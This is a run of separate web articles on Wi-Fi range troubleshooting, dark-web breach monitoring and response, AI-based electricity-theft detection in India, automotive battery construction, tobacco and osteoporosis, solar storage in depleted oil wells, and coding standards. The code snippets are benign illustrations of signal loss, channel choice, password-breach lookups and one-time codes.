How to Extend the Range of Your Wireless Network: Diagnosing a Problem Signal
Note: this article is primarily intended for smaller organizations.
Wireless devices such as laptop computers use radio frequency (RF) waves to communicate with one another, and just like the radio waves that you hear on your car radio, the RF waves from a wireless access point (AP) — the device that links up your wired and wireless networks — get weaker and weaker the further away you get from the source. Moreover, metal, concrete, books, and other electronic devices can all interfere with a wireless signal, distorting it and limiting its range.
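The falloff with distance can be quantified with the standard free-space path loss (FSPL) formula. Here is a quick Python sketch (illustrative only; real buildings add wall and interference losses on top of this):

```python
import math

def fspl_db(distance_m: float, freq_mhz: float) -> float:
    """Free-space path loss in dB (distance in meters, frequency in MHz)."""
    # FSPL(dB) = 20*log10(d_km) + 20*log10(f_MHz) + 32.44
    d_km = distance_m / 1000.0
    return 20 * math.log10(d_km) + 20 * math.log10(freq_mhz) + 32.44

# A 2.4 GHz signal loses roughly 6 dB every time the distance doubles:
for d in (10, 20, 40, 80):
    print(f"{d:>3} m: {fspl_db(d, 2400):.1f} dB")
```

Since every 6 dB of loss corresponds to a doubling of distance, moving an access point even a little closer to the dead zone can make a noticeable difference.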
Before you can treat a temperamental signal, you need to make sure that the signal really is the problem. Here are some diagnostic tools and guidelines to help you get started.
Wireless Network Diagnostic Tools:
Site surveys can help you determine exactly where you have coverage and where you don’t. You can get a very rough measure of the strength of your signal by carrying a laptop around your organization and seeing how many “bars” you get. On a Windows XP/Vista/7 machine, you’ll see one to five bars in the lower right corner of the desktop; more bars indicate a stronger signal. To get a more precise measurement, you’ll have to download special software or buy a device specifically designed to measure the wireless signal. NetStumbler and inSSIDer are free programs, and there are numerous others that can also help with this process.
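The “bars” display is just a bucketing of the received signal strength (RSSI, measured in dBm). The exact cutoffs vary by operating system and driver; the thresholds below are illustrative assumptions, not Windows’ actual values:

```python
def rssi_to_bars(rssi_dbm: float) -> int:
    """Map a received signal strength (dBm) to a 1-5 'bars' display.
    Thresholds are illustrative; every OS/driver picks its own cutoffs."""
    thresholds = [(-50, 5), (-60, 4), (-70, 3), (-80, 2)]
    for cutoff, bars in thresholds:
        if rssi_dbm >= cutoff:
            return bars
    return 1

print(rssi_to_bars(-45))  # strong signal near the AP
print(rssi_to_bars(-75))  # weak signal, e.g. behind a concrete wall
```

This is why survey tools that report raw dBm are more useful than the bars display: two locations can show the same bars while differing by several dB.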
Some factors that can cause a weak or distorted wireless signal:
1. Your wireless access point might not be in the best possible location.
2. Are the materials in your building getting in the way? The signal from most access points will extend for about 300 feet in ideal circumstances. However, certain materials, such as concrete, books, and metal, can attenuate or distort a wireless signal, so your range depends on the design and construction of your building. If you have a strong connection on one side of a wall but no signal or a weak signal on the other side, there’s probably something in the wall blocking your signal.
3. Are other electronic devices interfering with the signal from your access point? Today’s wireless equipment usually operates in the 2.4 GHz band of the electromagnetic spectrum. Unfortunately, several other common devices use this same frequency: cordless phones, microwave ovens, and garage door openers all operate at 2.4 GHz. Cordless phones are especially troublesome, since they’re so prevalent. Furthermore, your access point might be conflicting with a neighbor’s access point. If your wireless signal is inconsistent, interference might be the problem; a telltale sign is that the signal gets weaker when the interfering devices are in use and stronger when they’re not.
4. Are you using an old version of wireless? There have been three especially popular wireless standards: 802.11b, followed by 802.11g, succeeded by 802.11n. 802.11n has twice the range of 802.11g or 802.11b, and it’s quite a bit faster. The newer 802.11ac standard operates in the 5 GHz band, and dual-band 802.11ac routers combine 2.4 GHz and 5 GHz channels for combined speeds of 1200 Mbps and up. Channel widths are also larger, which can add to interference problems.
1. Most access points broadcast to an equal distance in all directions. Putting the access point in a central location might allow the signal to reach more places in your building.
2. Putting the access point up high on a wall, or on the ceiling, can also increase your range. You can also increase the antenna gain: use a high-gain omnidirectional antenna for central placement, a sectorized antenna for outdoor wall placement, or a directional patch antenna for narrow coverage.
3. Move your access point away from any materials that might be distorting the signal (such as concrete, metal, books, and so on). You might also consider upgrading to an 802.11ac access point.
4. Move your access point away from any electronic devices that might be distorting the signal (for example, microwave ovens, cordless phones, and so on).
5. Change the channel. Wireless devices in the United States operate on one of 11 different channels. When two devices use the same channel, the interference and signal distortion are greater. Furthermore, several of the channels overlap with one another, so if one device uses channel 3 and another uses channel 4, the interference will still be strong if the devices are close to one another. The non-overlapping channels are 1, 6, and 11. Choose one of these three channels to start with, and if your signal is still weak, switch to another. For more information on changing the channel, see the manual that came with your access point. Newer access points sometimes ship with a default of “Auto Channel Selection,” which automatically selects the best channel for your setup.
6. Buying a stronger antenna for your access point or your wireless adapter could boost the strength of the signal. However, many wireless manufacturers design their equipment so the antennas can’t be replaced, so check your manual first.
7. Buy another access point and configure it as a wireless repeater, or hardwire it, in the area with little or no coverage from your main access point. Assign the second access point the same SSID as the first so that laptops can seamlessly transfer their connection from one AP to the other. Repeat until you have the coverage you need. (The SSID is the name your access point uses to identify itself. When laptop users look for a wireless signal to connect to, they’ll see your SSID if they’re within range of your access point.)
8. Consider buying a wireless repeater (sometimes known as a range extender or a range expander). This device receives a wireless signal and then retransmits and amplifies that signal (in other words, “repeats” it), which can effectively double the size of your wireless network. However, a repeater will also slow your wireless network down somewhat. There are several brands of repeaters on the market, and sometimes you can configure a regular access point to act as a repeater. Check the manual that came with your access point for instructions.
9. Switch to 802.11n or 802.11ac wireless equipment (sometimes marketed as MIMO equipment). 802.11n equipment looks and acts more or less like older wireless equipment (for example, 802.11g and 802.11b gear), except that it’s faster and has better coverage. 802.11ac builds on this further: it’s faster still, offers larger channel widths, and dual-band models combine the 2.4 GHz and 5 GHz frequencies.
All of your equipment has to comply with the new standard in order to take advantage of the gains in speed and range. Therefore, you’ll have to buy new access points and new wireless adapters to see the benefits of the newer 802.11 standards.
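The channel-selection advice in tip 5 is easy to automate. This sketch assumes you already have a list of the channels your neighbors’ APs are using (for example, from NetStumbler or inSSIDer) and treats 2.4 GHz channels within four of each other as overlapping:

```python
def least_congested(neighbor_channels):
    """Pick the non-overlapping 2.4 GHz channel (1, 6, or 11) with the
    least interference from neighboring APs. Channels within 4 of each
    other overlap, so a neighbor on channel 3 counts against both 1 and 6."""
    candidates = (1, 6, 11)
    def interference(ch):
        return sum(1 for n in neighbor_channels if abs(n - ch) < 5)
    return min(candidates, key=interference)

# Neighbors on channels 1, 1, and 3: channel 11 is the cleanest choice.
print(least_congested([1, 1, 3]))  # -> 11
```

This is essentially what “Auto Channel Selection” does at boot time, though commercial implementations also weigh measured signal strength, not just channel counts.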
For more information, visit www.gnswireless.com
What is the Dark Web?
The dark web is a part of the internet that is not indexed by search engines and can only be accessed through a specialized web browser. It operates with a high degree of anonymity: it works by routing all communications through multiple servers in different parts of the world and encrypting them at every step.
Because of its anonymous and uncensored nature, the dark web can be used for both legal and illegal applications. Unknown to many, the dark web was conceived and prototyped by military researchers at the US Naval Research Laboratory, who had recognized that the open internet was extremely vulnerable to surveillance. Today, the dark web is not only used by the military but is open to everyone.
The dark web is a hive of activity. You can buy almost anything, including guns, drugs, computers, phones, hacked accounts, credit cards, and software. You can also hire a hacker to execute a cyber-attack. Most frightening of all, you can even hire an assassin.
How does my Information get on the Dark Web?
As you already know, the dark web is full of hackers and all sorts of criminals who target almost anyone. For these hackers, small businesses are no exception to their attacks. For this reason, it is not uncommon to find your information on the dark web.
Criminals will steal your information in a variety of ways. Some attempt to collect your information through phishing attacks. Others will hack into your accounts by cracking passwords or by using malware that captures your passwords, financial information, and other sensitive information. However, not all of them are high-tech. Some criminals are known to go through trash looking for documents containing personal data.
Once these attackers have your information, they might auction it to the highest bidder or post it on dark web forums for the world to see.
What are the Top Ways to determine if my Accounts have been exposed?
Due to the uncensored nature of the dark web, it is very difficult to know if your information has found its way there. There are thousands of hacking forums bringing together millions of hackers from all over the world.
Here are the two ways to determine if your accounts have been exposed:
1. Conduct a Dark Web Scan
Cybersecurity organizations have built tools that will scan the dark web for any traces of your information. HacWare's Security Awareness solution offers continuous dark web monitoring that searches for accounts connected to breaches and sends you an alert when someone with your company email domain has been found. Another service that offers dark web scanning for small businesses is Connections for Business; they only require some personal details, then scan the dark web for any traces of your information and email you the report.
2. Search your Details in Breaches Databases
You can also search for your information in data breach databases. These databases keep track of known data breaches and store searchable information on publicly accessible websites. The biggest and most popular is Have I Been Pwned. This database was created in 2013 by Troy Hunt, a Microsoft Regional Director and MVP.
With over two hundred thousand visitors each day, four million email subscribers, and information on more than eleven billion compromised accounts, it is by far the biggest and most popular way to detect if your data was breached. You start by feeding in your email address, and within seconds it is searched across billions of breached records. If your information is found, details of the data breach will appear.
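The related Pwned Passwords service uses a k-anonymity scheme: your client sends only the first five hex characters of the password’s SHA-1 hash and checks the returned suffixes locally, so the password itself never leaves your machine. A minimal sketch of the client-side hashing (the network call is omitted):

```python
import hashlib

def pwned_range_query(password: str):
    """Split a password's SHA-1 hash for a k-anonymity lookup.
    The Pwned Passwords API (api.pwnedpasswords.com/range/<prefix>)
    only ever sees the 5-character prefix, never the password itself."""
    sha1 = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    prefix, suffix = sha1[:5], sha1[5:]
    # In a real check you would GET the /range/<prefix> endpoint and
    # look for `suffix` in the returned list of hash suffixes.
    return prefix, suffix

prefix, suffix = pwned_range_query("password")
print(prefix)  # 5BAA6 -- the only data that leaves your machine
```

Because every query for the same prefix returns hundreds of candidate suffixes, the server cannot tell which password you were actually checking.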
What Next if your Accounts have been Exposed?
It is very scary to find out that your personal information has been exposed. Luckily, you can still regain control even if your information was breached. Before you take the next steps, it is vital to find out the extent of the data breach. Once you have this information, you can take the following steps.
1. Change Exposed Passwords
It is a good thing to constantly change your password. In the event of a data breach, it is especially important to change the affected passwords to something strong, secure, and unique. A strong password, in general, should have at least 8 characters made up of letters, numbers, and symbols.
You should consider using a password manager such as 1Password to help generate and keep track of strong passwords.
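The minimum bar described above (at least 8 characters, with letters, numbers, and symbols) can be checked mechanically. A minimal sketch; a real policy would also favor longer passwords and screen against known-breached-password lists:

```python
import string

def is_strong(password: str) -> bool:
    """Check the article's minimum bar: at least 8 characters with
    letters, numbers, and symbols."""
    return (len(password) >= 8
            and any(c.isalpha() for c in password)
            and any(c.isdigit() for c in password)
            and any(c in string.punctuation for c in password))

print(is_strong("Tr0ub4dor&3"))  # True
print(is_strong("password"))     # False -- no digits or symbols
```

A password manager applies rules like these automatically when generating credentials, which is why it is the easier path for most users.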
2. Enable 2-Factor Authentication
In addition to changing your passwords, you should sign up for two-factor authentication (Also known as two-step verification or 2FA). This is an additional layer of security offered by many services today such as Facebook and Gmail. With 2FA, your accounts will require an additional level of authentication such as a one-time code sent to your email or phone. This means that even if attackers have your password, they cannot access your account without the second part of the verification process.
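Most authenticator-app codes are generated with HOTP (RFC 4226) or its time-based variant TOTP (RFC 6238), which derive a short one-time code from a shared secret. A minimal HOTP sketch, checked against the RFC’s published test vectors:

```python
import hashlib, hmac, struct

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """Minimal HOTP (RFC 4226), the algorithm behind most 2FA codes.
    TOTP (RFC 6238) is the same thing with counter = time() // 30."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                      # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# RFC 4226 test vectors for the ASCII secret "12345678901234567890":
print(hotp(b"12345678901234567890", 0))  # 755224
print(hotp(b"12345678901234567890", 1))  # 287082
```

Because the attacker would need the shared secret (or your phone) to compute the next code, a stolen password alone is no longer enough to log in.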
3. Freeze your Financial Accounts
If you find out that attackers have your financial information, you can contact your bank asking them to freeze any transactions in your name. This is a temporary move to prevent attackers from making transactions in your name. This is most applicable when you find out that your credit card information was breached. Once you regain access, you can unfreeze your accounts at your convenience.
4. Communicate that there was a breach with your stakeholders and customers.
Honest, open communication is a form of security awareness. It builds trust with customers and is the first step to repairing any reputational damage.
Today, everyone is a potential target for cyber-attacks. Large multinational corporations and small businesses are targeted alike. The dark web offers uncensored and anonymous platforms where these attackers can plot their moves and auction your information or expose it for the world to see. Small businesses must be constantly on the watch for potential attacks. If you find out that your information was breached, you should take action without delay.
Want to Learn More?
Learn more about HacWare at hacware.com. If you are a Managed Security Service provider (MSSP) or IT professional, we would love to automate your security education services, click here to learn more about our partner program. | <urn:uuid:9fce99b8-74bd-4a24-925b-e8823dd03ac4> | CC-MAIN-2024-38 | https://www.resources.hacware.com/how-to-dark-web-scan-your-small-business | 2024-09-08T22:41:00Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651035.2/warc/CC-MAIN-20240908213138-20240909003138-00128.warc.gz | en | 0.956351 | 1,252 | 2.75 | 3 |
India is probably the only country in the world to provide free power to all of its farmers, as they provide the nation with much-needed food. However, only a few states, like Telangana, are genuinely offering free power to farmers, in the hope of gaining political mileage in the upcoming elections.
But this can only succeed when power generation stays in balance with the revenue earned. That is not happening in practice, as much of the power distributed to farmers is being misused and goes unaccounted for various reasons, inflicting huge losses across the Indian subcontinent.
However, the central government, led by Prime Minister Shri Narendra Modi, now seems set to take stringent action against such malpractices. It is planning to use Artificial Intelligence (AI) technology and other Machine Learning (ML) tools to keep a check on power theft and the power wastage involved in offering free power to farmers.
A plan is also being drafted to channel the generated power units in a resourceful way, cutting down theft, spillage, and misuse.
Under the Revamped Distribution Sector Scheme (RDSS), and as per published reports, the aggregate technical and commercial loss of electricity was estimated at 17% in FY22, down from 22% the previous year.
This year (FY23), the government is planning to leverage advanced information and communication technologies using the power of AI/ML. The aim is to curb power theft and cut the losses incurred through misuse.
According to the Indian Ministry of Power, installing prepaid smart meters on the UK model can play an active role in reducing power distribution losses in utilities, as it keeps money spent on generation tightly balanced against usage, with little or no human intervention in energy accounting and revenue auditing.
Along with smart metering and feedback from Advanced Metering Infrastructure, system metering (at the feeder, transformer, and consumer premises) might also help generate healthy revenue for discoms that are already struggling with losses.
Of the 1,491,850 million units of power generated in FY 2021-2022, only 51% made the cash registers ring. The rest was either wasted or went unaccounted for.
Thus, to keep a check on unaccounted usage, the BJP-led Indian government is keen to use AI technology and ML tools to eradicate anomalies in power distribution and revenue generation.
A ministerial meeting with the heads of the states, i.e. the Chief Ministers, is scheduled for May this year, and a final decision will be taken thereafter.
An automotive battery is an electrochemical device (a device that uses both electrical energy and chemical energy to operate) that stores and produces electric current and voltage. A conventional automotive battery is also called a lead-acid battery because of the materials used in its construction.
A 12-volt battery is made up of a group (or “battery”) of cells that generate an electric charge. A basic battery cell can be made by placing two dissimilar metal electrodes (metal plates that can donate and receive electrons) into an acid-filled container. Electrons are pulled from one electrode and attracted to the other, producing an electric current. See Figure 2.
Figure 2. A basic battery cell can be made by placing two unlike metal electrodes in a jar of sulfuric acid. A chemical reaction occurs in which electrons flow between the two electrodes.
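The “battery of cells” idea can be sketched numerically. Cells wired in series add their voltages; assuming the commonly cited nominal value of about 2.1 V per lead-acid cell (an approximation, since actual cell voltage varies with state of charge):

```python
def battery_voltage(cells: int, volts_per_cell: float = 2.1) -> float:
    """Cells wired in series add their voltages. A nominal lead-acid
    cell produces about 2.1 V, so a standard 6-cell automotive
    battery reads roughly 12.6 V when fully charged."""
    return cells * volts_per_cell

print(round(battery_voltage(6), 1))  # 12.6
```

This is why a “12-volt” automotive battery actually reads about 12.6 V at rest when healthy and fully charged.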
Battery Cell Construction
The parts of a basic battery cell include:
Positive plates—electrodes of lead peroxide (PbO2).
Negative plates—electrodes of finely ground or powdered lead (Pb).
Electrolyte—a solution of sulfuric acid (H2SO4) and water (H2O).
Separators—material that keeps the positive and negative plates from touching and creating a short circuit.
Battery plates are made of a stiff mesh grid coated with porous lead alloys. See Figure 3A. The chemically active material in the negative plates is sponge lead (lead that has been finely ground or powdered to increase its porosity).
Since the lead on the plates is porous, like a sponge, the sulfuric acid easily penetrates into the lead. This helps the chemical reaction and the production of electricity.
A—Positive and negative plates. Notice the position of the tabs on the top edge. These tabs contact the plate strips to conduct electricity.
B—The plates in the positive and negative plate groups are interspersed, with separators to keep the plates from touching and shorting out.
C—A plate strap holds each battery element together. The plate straps placed end-to-end to conduct electricity from one cell to another. The terminal posts are usually formed onto the ends of the plate straps.
The active material on the positive plates is lead peroxide. Calcium or antimony is added to the lead to increase battery performance and to decrease gassing (the formation of explosive hydrogen gas during the chemical reaction).
Several battery plates are needed in each cell to provide enough battery power for automotive use. See Figure 3B. A metal plate strap is used to join several negative plates to form a negative plate group. Another plate strap links the positive plates to make a positive plate group.
The connectors in each cell are placed in contact with the connectors in the adjacent cells so that electricity can be conducted along the length of the battery. See Figure 3C. The battery terminals (posts or side terminals) are constructed as part of the end connectors.
Separators fit between the battery plates to keep them from touching and shorting against each other. The separators are made of a porous insulating material that allows free circulation of the electrolyte around the plates.
The negative plate group, positive plate group, plate straps, and their separators make up a battery element; whereas, the battery cell contains these elements plus electrolyte. Refer again to Figure 3C.
The electrolyte in an automotive battery, often called battery acid, is a mixture of sulfuric acid and distilled water. This mixture is poured into each cell until the plates are covered to complete the functional battery cells.
The automotive battery case encloses the battery cells. It is usually made of high-quality polypropylene. The case must withstand severe vibration, cold weather, engine heat, extreme temperature changes, and the corrosive action of the battery acid. Dividers in the case form individual containers for each cell.
The battery cover is bonded to the top of the battery case. It seals the top of the case and provides an opening above each battery cell for battery caps or a cell cover. Refer to Figure 4.
Figure 4. Cutaway view of an automotive battery showing inside and outside components. (Delco)
Automotive Battery Terminals
Battery terminals provide a means of connecting the battery plates to the vehicle’s electrical system. They are usually formed as part of the end connectors. Two battery posts or side terminals can be used. Some large truck batteries have threaded posts, as shown in Figure 5.
Figure 5. Basic terminal types. Side terminals are becoming more common because they resist corrosion very well.
Battery posts are round metal terminals sticking out of the top of the battery cover. They serve as male connections for female battery cable ends. The positive post is larger than the negative post. It may be marked with red paint and a positive (+) symbol. The negative post is smaller and may be black or green in color. It normally has a negative (–) symbol on or near it.
Side terminals are electrical connections on the side of the battery. They have female threads that accept a special bolt on the battery cable end. Side terminal polarity is identified by positive and negative symbols on the case.
Automotive Battery Charge Indicator
A battery charge indicator, or hydrometer, measures the specific gravity of the electrolyte in the battery as a measure of the general charge level of the battery. Refer again to Figure 4.
Specific gravity is the density of a solution relative to water, which has a density of 1. As the battery weakens, the specific gravity of its electrolyte becomes closer to 1.
The charge indicator changes color with changes in battery charge, as shown in Figure 6. For example, the indicator may be green when the battery is fully charged. It may turn black when the battery is discharged or yellow when the battery needs replacement.
Figure 6: A-The hydrometer is mounted in the battery cover. The small float ball floats higher when acid strength and state of charge are high. B—Operation of an automotive hydrometer.
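The charge indicator’s color bands correspond to specific-gravity ranges. A rough sketch of the mapping, using commonly cited field values (about 1.265 for fully charged and 1.120 for discharged; the linear interpolation is an approximation, not a manufacturer calibration):

```python
def state_of_charge(specific_gravity: float) -> float:
    """Rough state of charge (%) from electrolyte specific gravity.
    Commonly cited field values: ~1.265 = fully charged, ~1.120 =
    discharged. Linear interpolation between them is an approximation."""
    full, empty = 1.265, 1.120
    soc = (specific_gravity - empty) / (full - empty) * 100
    return max(0.0, min(100.0, soc))

print(state_of_charge(1.265))  # 100.0
print(state_of_charge(1.190))  # roughly half charged
```

Note that electrolyte temperature also shifts the reading, which is why shop hydrometers include a temperature-correction scale.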
Battery Tray and Retainer
A battery tray and retainer hold the battery securely in place. They keep the battery from bouncing around during vehicle movement. It is important that the tray and retainer be in good condition and tight to prevent battery damage. See Figure 7.
Figure 7. The battery sits on the battery tray. The retainer holds the battery in the tray during vehicle movement. (Cadillac)
Automotive Battery Cables
Battery cables are large conductors that connect the battery terminals to the electrical system of the vehicle. See Figure 8A. The positive battery cable is normally red and fastens to the starter solenoid. The negative battery cable is usually black and connects to ground on the engine block.
In some vehicles, the negative battery cable has a body ground wire to ensure that the vehicle body is grounded, as shown in Figure 8B. If this wire does not make a good connection, a component grounded to the vehicle’s body may not operate properly.
Figure 8. The automotive battery cable may be connected to the vehicle’s electrical system in slightly different ways, depending on the make and model.
Sometimes a battery junction block is placed between the positive battery terminal and the solenoid. This junction block allows other wires to make electrical contact with the positive battery cable to power the dash and accessories. See Figure 9. In other vehicles, the starter solenoid may serve the same function.
Figure 9. A junction block may be used so that other wires can obtain power from positive battery cable | <urn:uuid:7a851cef-6f7a-439d-9904-73f1e34d4344> | CC-MAIN-2024-38 | https://electricala2z.com/tech/automotive-battery/ | 2024-09-11T06:10:49Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651344.44/warc/CC-MAIN-20240911052223-20240911082223-00828.warc.gz | en | 0.935848 | 1,563 | 3.875 | 4 |
Tobacco Consumption Causes Osteoporosis, Say Experts
Tobacco consumption could lead to osteoporosis.
According to medical experts, prolonged tobacco consumption reduces bones’ ability to maintain and repair and they get weak and prone to fractures, especially those above 40 years of age.
Prof Shah Waliullah, senior faculty at the orthopaedic department of King George’s Medical University (KGMU), said, “Bones have two types of cells, called osteoclasts and osteoblasts, which are responsible for breaking down and building bone. Osteoclasts break down bone so that it can be remodelled, while osteoblasts form new bone where the osteoclasts have broken it down, and this process continues throughout life.”
However, in people who consume tobacco for a long time, whether by smoking or chewing, the number of osteoclasts increases while the number of osteoblasts decreases. Eventually this causes osteoporosis, because bone density goes down.
Another orthopaedic surgeon at KGMU, Dr Mayank Mahindra said, “We see this tobacco-induced osteoporosis among middle-aged patients. They often start consuming tobacco in their teens and by the age of 35-40 years, they get this disease.”
Prof Vikram Singh of Ram Manohar Lohia Institute of Medical Sciences (RMLIMS) said, “Quitting smoking and other forms of tobacco consumption while maintaining a healthy lifestyle can prevent osteoporosis.”
The sprawling landscapes of Kern County, California, tell a tale of transformation. Formerly known for its extensive oil production, the region is now at the forefront of an innovative shift toward sustainable energy. The heart of this change lies in a groundbreaking project called Geological Thermal Energy Storage (GeoTES), which aims to repurpose depleted oil wells into vessels of solar energy storage. This pioneering venture aligns seamlessly with California’s ambitious goal to achieve carbon-neutral energy production by 2045.
Harnessing the Power of the Sun with GeoTES
Kern County’s depleted oil wells are finding new life through GeoTES technology. GeoTES is designed to store solar energy as heat within the geological formations that once held oil. The process involves heating groundwater by using solar power, thereby transforming the former oil reservoirs into energy storage systems. This innovative approach not only makes use of existing infrastructures but also avoids the environmental pitfalls associated with traditional battery storage.
The environmental advantages of GeoTES are significant. Unlike lithium-ion batteries that depend on mining rare metals, GeoTES relies on natural geological formations. This method minimizes environmental disruption and aligns perfectly with the goal of sustainability. Furthermore, the efficiency of repurposing oil wells reduces the need for new construction, thereby cutting down on additional environmental impacts.
Repurposing these wells offers a dual benefit: it helps meet energy storage needs while also contributing to the global push toward renewable energy sources. As the sun shines in abundance over California, the ability to store this energy efficiently is a game-changer for both the local community and the broader energy market.
Economic Revitalization and Job Creation
One of the most compelling aspects of the GeoTES project is its potential to revitalize the local economy. Kern County has long been dependent on oil for its economic stability, and the shift towards clean energy presents a unique opportunity for the region. The transition is not just about clean energy; it’s also about preserving jobs and creating new ones.
The skills of the local workforce, honed over years in the oil and coal industries, are directly transferable to the new clean energy projects. Former oil workers, geologists, and engineers can apply their expertise to manage and maintain GeoTES systems, ensuring a smooth transition and retaining valuable employment opportunities in the region.
Moreover, the shift to clean energy projects promises to attract new investments and spur economic growth. By leading the way in innovative energy storage solutions, Kern County can establish itself as a hub of cutting-edge technology and sustainability. This economic diversification is crucial for long-term stability and growth, making the GeoTES project a win-win scenario for the region.
Aligning with California’s Carbon-Neutral Goals
California has set an ambitious target to achieve carbon neutrality by 2045, and the GeoTES project is a significant step towards this goal. By providing a scalable, sustainable solution for energy storage, GeoTES supports the broader effort to transition away from fossil fuels and reduce greenhouse gas emissions.
The impact of GeoTES is far-reaching. By storing solar energy effectively, it ensures a consistent power supply even when the sun isn’t shining. This reliability is crucial for the adoption of renewable energy sources like solar and wind, which are inherently intermittent. GeoTES thus plays a pivotal role in integrating renewable energy into the grid, making it feasible for California to meet its carbon-neutral objectives.
Furthermore, projects like GeoTES demonstrate how existing industrial infrastructures can be repurposed for environmental benefit. This approach reduces the need for new land use and construction, further minimizing the carbon footprint of clean energy initiatives. By leading the way in innovative energy solutions, California sets a powerful example for other regions and countries aiming for sustainability.
Technological Innovations in Energy Storage
The GeoTES project showcases remarkable technological innovation by repurposing oil wells for energy storage. Traditional energy storage methods like lithium-ion batteries have several drawbacks, including reliance on rare metals and challenging environmental footprints. GeoTES, on the other hand, leverages well-established geothermal principles uniquely adapted for solar energy storage.
In the GeoTES system, solar energy is used to heat groundwater stored in the geological formations of depleted oil reservoirs. This heated water can then be brought to the surface and used to generate electricity using conventional steam turbines when there is a demand for power. This method efficiently stores and releases energy, providing a reliable power source without the environmental hazards of traditional battery storage.
Moreover, the technology behind GeoTES is scalable. It can be implemented across various locations with depleted oil reserves, making it a versatile solution for energy storage needs. The potential to power hundreds of thousands of homes with stored solar energy highlights the extensive impact this technology can have on the energy landscape.
Addressing Environmental Challenges
The vast and varied landscapes of Kern County, California, narrate a compelling story of change. Known primarily for its rich history in oil production, this region is now emerging as a leader in the push for sustainable energy solutions. At the core of this transformation is an innovative initiative dubbed Geological Thermal Energy Storage (GeoTES). This project intends to repurpose exhausted oil wells, transforming them into storage units for solar energy.
GeoTES stands as a beacon of progress, reflecting California’s broader commitment to a cleaner, sustainable future. By converting these wells, what once served to extract fossil fuels will now be pivotal in storing renewable energy. This strategic pivot not only extends the life and utility of existing infrastructure but also mitigates the environmental impact associated with traditional energy sources.
Aligning closely with the state’s bold objective to achieve carbon-neutral energy by 2045, GeoTES represents a monumental step forward. It illustrates a creative solution to one of the significant challenges in renewable energy—how to store it efficiently for use when the sun isn’t shining. The success of GeoTES could serve as a model for other regions and ultimately play a crucial role in reducing greenhouse gas emissions.
In essence, Kern County is transforming its legacy of oil into a promising future of solar energy, demonstrating that innovation and sustainability can indeed go hand in hand. | <urn:uuid:06795633-c611-47f1-8348-9460759f1a35> | CC-MAIN-2024-38 | https://energycurated.com/environmental-and-regulations/transforming-oil-wells-into-eco-friendly-solar-energy-storage-systems/ | 2024-09-12T13:23:33Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651457.35/warc/CC-MAIN-20240912110742-20240912140742-00728.warc.gz | en | 0.909479 | 1,274 | 3.046875 | 3 |
Imagine if every musician in an orchestra decided to play their own version of Beethoven’s Symphony No. 9. The result would be chaotic, to say the least. This is exactly what happens in web development projects when developers do not follow a common set of coding standards. I invite you to explore the melodious world of coding standards.
In this article, we’ll dissect these standards piece by piece, not only to understand what they are but also to learn how to effectively teach them to the next generation of web maestros – our junior web developers.
Chapters to Tune Into:
- Decoding the Standards: What Are Coding Standards?
- Conducting the Orchestra: Teaching Coding Standards Effectively
- Tools of the Trade: Linters, Formatters, and Other Aides
- Rehearsing the Code: Practice Techniques for Juniors
- Encore: Cultivating a Culture of Quality and Consistency
1. Decoding the Standards: What Are Coding Standards?
Just as every well-composed piece of music has a structure that musicians understand and follow, coding standards provide a framework that developers use to write their code. These standards are the sheet music of programming, guiding developers through the complex symphony of software development.
Coding standards are crucial for ensuring that a codebase is maintainable, scalable, and understandable. Here’s a more detailed look at the key areas of coding standards:
1.1. Naming Conventions
Naming conventions are critical because they help ensure that the code is intuitive and that its intent is immediately clear to any developer (or future you). Good naming conventions streamline the process of understanding the software, making it easier to maintain and modify. Here are some general principles:
- Descriptive Names: Use names that describe what the variable, function, class, or module does. For instance, a function name like calculateTotalWeight() is preferable to a vague name like doTheThing().
- Consistency: Stick to a particular pattern throughout your project. For example, if you’re using camelCase for variables, continue to use camelCase throughout your codebase.
- Avoid Abbreviations and Single Letter Names: Except for common practices (like i for loop indices), avoid abbreviations and single letters. Names like userList are better than uL.
- Context Matters: Choose names appropriate to the context and that provide clear information about their use.
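These principles can be seen in a minimal before-and-after sketch, reusing the article's own calculateTotalWeight() example (the item shape and sample data are invented for illustration):

```javascript
// Bad: vague name, single-letter identifiers, no hint of intent.
function doTheThing(l) {
  let t = 0;
  for (const x of l) t += x.w;
  return t;
}

// Good: descriptive names, consistent camelCase, units in the name.
function calculateTotalWeight(cargoItems) {
  let totalWeightKg = 0;
  for (const item of cargoItems) {
    totalWeightKg += item.weightKg;
  }
  return totalWeightKg;
}

const cargoItems = [{ weightKg: 2.5 }, { weightKg: 4.0 }];
console.log(calculateTotalWeight(cargoItems)); // 6.5
```

Both functions do the same thing; only the second one tells the next developer what that thing is.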
1.2. Formatting Rules
Formatting involves the physical appearance of the code. While it may not affect the functionality, proper formatting makes the code more readable and organized. Key aspects include:
- Indentation and Spacing: Consistent use of indentation (spaces vs. tabs, the number of characters per indent) defines hierarchical relationships between lines of code.
- Braces Style: Whether you place braces on the same line as the function, class, or control statement, or on a new line, keep it consistent.
- Line Length: Avoid lines that are too long; they should be easy to read on a standard screen without scrolling horizontally.
- File Structure: Organize code files logically. Group similar functions together and separate distinct components appropriately.
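A short sketch with one consistent style applied throughout (2-space indentation, same-line braces and short lines are one common choice; the point is the consistency, not this particular style):

```javascript
// One style, applied everywhere: 2-space indents, opening braces on
// the same line, every line kept well under 80 characters.
function isWithinLineLimit(line, maxLength = 80) {
  return line.length <= maxLength;
}

function countOverlongLines(lines, maxLength = 80) {
  let overlong = 0;
  for (const line of lines) {
    if (!isWithinLineLimit(line, maxLength)) {
      overlong += 1;
    }
  }
  return overlong;
}

const sample = ["short line", "x".repeat(120)];
console.log(countOverlongLines(sample)); // 1
```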
1.3. Commenting Practices
Comments in the code should help explain the “why” behind the “what.” Comments are not a substitute for poor naming but are there to provide additional clarity and reasoning:
- Relevant Comments: Comments should add value, explaining why something is done a certain way if it’s not immediately obvious.
- Maintain Comments: Outdated comments are as harmful as outdated code. Ensure comments are updated alongside the code they describe.
- Avoid Over-Commenting: Don’t state the obvious; focus on the complexities and nuances that might not be immediately evident from the code alone.
